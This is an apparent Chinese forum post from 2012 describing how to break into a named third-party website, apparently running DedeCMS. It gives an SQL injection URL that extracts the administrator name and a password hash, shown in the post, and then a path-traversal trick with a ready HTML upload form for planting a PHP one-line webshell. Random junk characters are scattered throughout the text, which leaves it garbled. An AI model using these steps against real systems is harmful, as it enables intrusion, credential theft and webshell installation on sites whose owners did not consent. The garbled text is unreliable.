①注入漏洞。
/ I& W5 |2 J; }5 |这站 http://www.political-security.com/0 e, I# J5 U2 |$ H$ ]9 Y
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
3 [( E1 y7 Y/ e% a9 v& swww.political-security.com/data/mysql_error_trace.inc 爆后台- j; P1 h% B P5 B
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。' u. X9 g$ j2 w' o4 \+ T
然后写上语句 : M0 a" B U( g+ D
查看管理员帐号& @4 R+ |7 }8 y$ {4 O
http://www.political-security.co ... &membergroup=@`
: e! [" i7 [) K7 C+ N; m" A4 t( R- ^& k3 }
admin 4 J0 T( y+ @! b% W ~2 M( j5 I7 F
$ `2 l$ j0 j4 s+ i: ~4 o' M1 ^+ X9 t查看管理员密码
4 {0 \& D9 l, \. O7 e: n http://www.political-security.co ... &membergroup=@`$ k% s9 S, T2 Q1 v: {- u
7 r" i& a3 [( _5 {# e8d29b1ef9f8c5a5af429+ Y d, v& O" w; l3 ~$ ]7 Y
9 Y$ S" ^8 h. i2 ^查看管理员密码+ S9 s$ R8 a7 Z- s+ _# H
' |8 S& ]2 ?3 Z% b# ^
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5. g1 y( ?' D( v, f0 B
$ t* S# H( r9 E1 t8d20 z0 U$ _0 o8 Q8 n( \( }
9b1ef9f8c5a5af420 Q* n6 b! x6 H& }4 a
9
1 v% ]+ m* g( M, S ^+ ?1 n+ h5 D! `( k" {+ K3 H$ b6 H
cmd5没解出来 只好测试第二个方法: |$ s1 _1 E- o. ^
3 I' B, o; S8 ^* J6 h3 G% `
0 j7 {) G# F. N6 ]; `) T |
②上传漏洞:6 E: T1 Y& `% X) W2 X
0 c! ~7 H. T' d
只要登陆会员中心,然后访问页面链接) M4 o9 z& k5 Y- `, z9 E/ z
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
" S" ~9 l* {1 q0 V; D% R
7 y) J+ z' C% u# q2 u如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
* ^6 K8 B% G- z2 T7 ^9 L6 ?, X+ Y) Y7 f1 N$ A
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm& g9 b8 a6 i# K. S
: m. b, z6 F _ j: t8 d. [
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>8 f, {7 J/ o; c e
或者
8 L# u! u2 R% f& _/ X即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对